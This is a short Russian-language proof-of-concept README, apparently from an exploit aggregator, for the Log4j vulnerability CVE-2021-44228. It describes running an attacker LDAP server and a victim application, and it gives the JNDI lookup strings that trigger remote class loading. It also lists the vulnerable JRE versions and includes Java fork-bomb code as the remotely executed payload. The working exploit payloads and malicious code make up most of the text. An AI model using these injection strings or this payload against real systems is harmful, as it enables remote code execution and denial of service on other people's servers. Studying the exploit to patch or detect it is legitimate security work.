## https://sploitus.com/exploit?id=ED1C6DF0-94A0-58D6-B6F0-1034CE61DFCF
# log4j-exploit-with-fork-bomb
💣💥💀 Proof of Concept: пример запуска fork-бомбы на удаленном сервере благодаря уязвимости CVE-2021-44228
1. Создаем LDAP сервер атакующего (модуль server), который будет выдавать представления строк и кода (модуль payload)
2. Создаем пример жертвы (модуль victim) и передаем в Log4j строку
Версия JRE <= 6u211, 7u201, 8u191 и 11.0.1
```bash
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
```
3. Приложение-жертва получит от сервера атакующего массив байт и интерпретирует их в подставляемую строку или в выполяемый код (параметр `com.sun.jndi.ldap.object.trustURLCodebase = true`)
4. Для примера, исполняемым кодом будет fork-бомба (программа, которая запускает свои копии забивая все процессорное время)
```java
public class ForkBomb {
public static void main(String... args) {
Runtime.getRuntime().exec(new String[] {
"javaw",
"-cp",
System.getProperty("java.class.path"),
"ForkBomb"
});
}
}
```